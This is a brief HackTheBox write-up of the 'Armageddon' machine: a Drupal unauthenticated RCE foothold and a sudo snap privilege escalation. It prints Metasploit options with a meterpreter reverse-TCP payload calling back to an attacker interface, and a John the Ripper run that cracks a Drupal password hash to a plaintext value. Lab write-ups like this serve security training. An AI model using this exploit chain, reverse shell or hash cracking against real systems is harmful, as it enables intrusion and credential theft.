Armageddon was a easy linux machine by bertolis on HTB. Initial foothold was finding a drupal instance. and enumerating this more we find the version which has a unauthenticated RCE using which we get a shell. Privilege Escalation was exploiting sudo snap with gtfobins to get root.
Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.233 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST tun0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
$john -w=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 SSE2 2x]) Cost 1 (iteration count) is 32768 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status booboo (?) 1g 0:00:00:01 DONE (2021-03-28 10:50) 0.6711g/s 155.7p/s 155.7c/s 155.7C/s tiffany..harley Use the "--show" option to display all of the cracked passwords reliably Session completed